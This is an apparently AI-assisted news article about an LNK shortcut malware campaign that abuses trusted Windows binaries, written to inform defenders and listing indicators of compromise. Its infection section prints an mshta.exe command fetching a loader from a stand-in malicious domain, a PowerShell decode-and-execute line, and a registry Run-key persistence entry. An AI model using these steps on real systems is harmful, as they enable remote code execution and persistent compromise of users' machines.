Tuesday, August 11, 2026
LIVEThe Unrelenting Cyber Battle: Hacking Threats and the Imperative of Robust Data Protection///Navigating the Cyber Labyrinth: Bolstering Defenses Against Evolving Hacking Threats///The Dual Front War: Battling Hacking and Bolstering Data Protection in the Digital Age///The Ever-Evolving Cyber Threat Landscape: Navigating Hacking and Fortifying Data Protection///The Unseen Battle: Fortifying Data in an Age of Relentless Hacking///The Unseen War: Hacking's Relentless Advance and the Imperative of Data Protection///The Evolving Threat Landscape: Hacking, Data Protection, and the Imperative for Proactive Security///Navigating the Digital Minefield: Bolstering Data Protection in an Era of Relentless Hacking///The Dual Fronts of Digital Defense: Combating Hacking and Fortifying Data Protection///Hacking's New Frontier: Fortifying Data Protection in the Age of Advanced Cyber Threats///The Dual Front: Navigating Hacking Threats and Fortifying Data Protection in the Digital Age///Navigating the Digital Gauntlet: The Evolving Nexus of Hacking and Data Protection///The Unrelenting Cyber Battle: Hacking Threats and the Imperative of Robust Data Protection///Navigating the Cyber Labyrinth: Bolstering Defenses Against Evolving Hacking Threats///The Dual Front War: Battling Hacking and Bolstering Data Protection in the Digital Age///The Ever-Evolving Cyber Threat Landscape: Navigating Hacking and Fortifying Data Protection///The Unseen Battle: Fortifying Data in an Age of Relentless Hacking///The Unseen War: Hacking's Relentless Advance and the Imperative of Data Protection///The Evolving Threat Landscape: Hacking, Data Protection, and the Imperative for Proactive Security///Navigating the Digital Minefield: Bolstering Data Protection in an Era of Relentless Hacking///The Dual Fronts of Digital Defense: Combating Hacking and Fortifying Data Protection///Hacking's New Frontier: Fortifying Data Protection in the Age of Advanced Cyber Threats///The Dual Front: Navigating Hacking Threats and Fortifying Data Protection in the Digital Age///Navigating the Digital Gauntlet: The Evolving Nexus of Hacking and Data Protection///
Subscribe
Cyber Security
Independent · Digital
Thehackingpost
CybersecurityAI-assisted

New LNK Malware Uses Windows Binaries to Bypass Security Tools and Execute Malware

Recent attacks involving malicious Windows shortcut files (.LNK) have heightened security concerns. Emerging in late August 2025, this new malware exploits trusted Microsoft binaries to bypass endpoint protections and execute payloads without detection.

Recent attacks involving malicious Windows shortcut files (.LNK) have heightened security concerns. Emerging in late August 2025, this new malware exploits trusted Microsoft binaries to bypass endpoint protections and execute payloads without detection.

The malware is primarily delivered through spear-phishing emails and compromised websites. These shortcut files embed commands that utilize legitimate Windows utilities to download and execute additional malware components.

Indicators of compromise include unusual PowerShell calls and unexpected network connections, which are often mistaken for benign system activity.

The campaign targets both enterprise and consumer endpoints, focusing on users with elevated privileges. Initial lure emails mimic internal IT notifications or security alerts, prompting recipients to interact with a seemingly harmless attachment.

Upon execution, the .LNK file triggers Windows Explorer to load a hidden payload, utilizing mshta.exe and rundll32.exe to stage the attack. This method allows the malware to evade antivirus signatures and behavioral detection rules.

Analysts have observed that the LNK payload is designed to leverage encoded parameters passed to native utilities, complicating analysis by sandbox environments.

Recent attacks involving malicious Windows shortcut files (.LNK) have heightened security concerns.
Olivia Harper · Thehackingpost

Infection Mechanism and Payload Deployment

The malicious .LNK file embeds an OLE object pointing to a remote HTML application (HTA) script hosted on a compromised server. When executed, Explorer invokes mshta.exe with the command:

mshta.exe "http://malicious-domain.com/loader.hta"

The obfuscated loader script uses Base64-encoded PowerShell commands to download the next-stage payload:

$payload = 'aGVsbG8gd29ybGQ=' IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))

This technique minimizes disk writes and leverages rundll32.exe to load a malicious DLL directly into a suspended svchost.exe process, avoiding executable file scanning.

Advertisement

The DLL establishes persistence by creating a registry run key:

HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name "Updater" -Value "rundll32.exe C:\Windows\Temp\updater.dll,EntryPoint"

This ensures the malware launches automatically upon user login, even if endpoint detections attempt to quarantine the DLL file.

Indicators include network requests to suspicious domains, anomalous mshta.exe and rundll32.exe process trees, and unrecognized registry entries under the CurrentVersion\Run key.

Based on reporting by Cyber Security News.

AI transparency. This article was produced with the assistance of artificial intelligence and published under human editorial oversight. AI systems can make mistakes. Read how we use AI (EU AI Act, Art. 50).
Related Stories